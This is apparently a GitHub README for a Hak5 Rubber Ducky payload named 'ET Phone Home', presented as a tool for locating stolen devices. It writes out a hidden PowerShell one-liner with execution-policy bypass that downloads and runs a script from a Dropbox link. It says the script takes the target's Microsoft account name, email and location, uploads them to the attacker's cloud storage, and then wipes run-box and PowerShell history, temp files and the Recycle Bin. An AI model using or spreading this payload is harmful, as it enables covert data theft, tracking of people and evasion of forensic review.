![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# ET Phone Home A script I put together to locate your stolen devices, or your "stolen" baited devices ## Description This program is meant to locate your devices. When someone plugs it into their computer a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox. Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin. ## Getting Started ### Dependencies * DropBox - Your Shared link for the intended file * Windows 7,10,11

(back to top)

### Executing program * Your device is plugged into the targets computer * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl ``` Something Like What you see below will be in your cloud storage: NAME EMAIL LATITUDE AND LONGITUDE ``` Jakoby jakoby@example.com Latitude Longitude -------- --------- 37.778919 -122.416313 ```

(back to top)

## Contributing All contributors names will be listed here I am Jakoby Kalani

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

I am Jakoby


Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-ET-Phone-Home)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [MG](https://github.com/OMG-MG)

(back to top)